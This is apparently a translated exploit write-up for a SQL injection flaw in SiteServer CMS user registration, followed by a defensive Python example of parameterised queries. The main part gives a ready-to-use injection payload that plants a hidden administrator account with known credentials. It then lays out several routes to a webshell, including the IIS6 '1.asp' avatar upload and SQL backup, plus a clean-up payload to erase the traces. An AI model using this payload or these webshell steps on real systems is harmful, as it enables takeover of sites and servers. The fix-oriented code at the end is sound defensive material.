Author: blue girl
The problem is in Register in UserCenter.Pages.dll: the registration process has a logic flaw, as follows:
The program puts the user name into a database query; if the user name is not already taken, it proceeds to the second step;
It then runs the remote check for illegal characters in the user name; if there are none, it proceeds to the third step;
The new user is inserted into the database.
Because the program does no processing on the user name before it goes into the database query in the first step, that query is injectable. Orz...
Enter the following statement as the user name, and fill in the other fields normally.
1 2 3');insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
After the registration is submitted, a super user with user name blue and password lanhai is inserted into the database.
Default back-end address: http://127.0.0.1/siteserver
Whether to get a webshell or escalate privileges directly is a matter of taste, and everyone has their own way. From a quick look, there are 3 methods:
Site management -> Display functions -> Template management -> Add single page template -> generate an aspx file directly
Member permissions -> Add user -> set the user name to: 1.asp
Log in as the newly added 1.asp and upload a personal avatar; with the IIS6 parsing vulnerability this gives a webshell
(PS: the back end does not check whether the user name contains illegal characters when adding a user)
System Tools -> Utilities -> Machine parameters view
This shows the database type, name, and web path
System Tools -> Database Tools -> SQL statement query
This function is well made: it is effectively a Query Analyzer, and all output is echoed back. You can use a backup to get a webshell, or directly take advantage of an improperly configured SQL Server
When finished, remember to use
1 2 3');delete bairong_Administrator where UserName='blue';--
as the user name to register, which does the clean-up.
Finally, I hope SiteServer fixes this promptly after seeing it. This article is for technical study only; do not use it for illegal purposes.
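The registration flaw above comes from running the duplicate-name query on raw input before the illegal-character check. The following is an added example, not SiteServer's code, of the corrected flow in Python, with sqlite3 standing in for the CMS database; the table name, the user-name policy and the function names are assumptions.

```python
import re
import sqlite3

# Assumed allow-list policy for user names (not taken from SiteServer).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")


def open_db():
    """In-memory stand-in for the CMS database; the table name is hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    return db


def register(db, username, pw_hash, validate=True):
    """Return 'ok', 'invalid' or 'taken'. Validation runs before any query."""
    # Step 1: reject illegal characters before the value gets near SQL.
    if validate and not USERNAME_RE.fullmatch(username):
        return "invalid"
    # Step 2: duplicate check with a bound parameter, never string concatenation.
    if db.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone():
        return "taken"
    # Step 3: insert, again with bound parameters.
    with db:
        db.execute("INSERT INTO users (username, pw_hash) VALUES (?, ?)",
                   (username, pw_hash))
    return "ok"


def demo():
    db = open_db()
    hostile = "x'); SELECT 1;--"  # constructed input with quote and statement break
    results = [
        register(db, "alice", "h1"),
        register(db, "alice", "h2"),
        register(db, hostile, "h3"),
        # Validation switched off to show binding alone keeps the value as data.
        register(db, hostile, "h4", validate=False),
    ]
    rows = [r[0] for r in db.execute("SELECT username FROM users ORDER BY username")]
    return results, rows


if __name__ == "__main__":
    print(demo())
```

The same two controls apply to the back-end "add user" form, which the article notes also skips the illegal-character check.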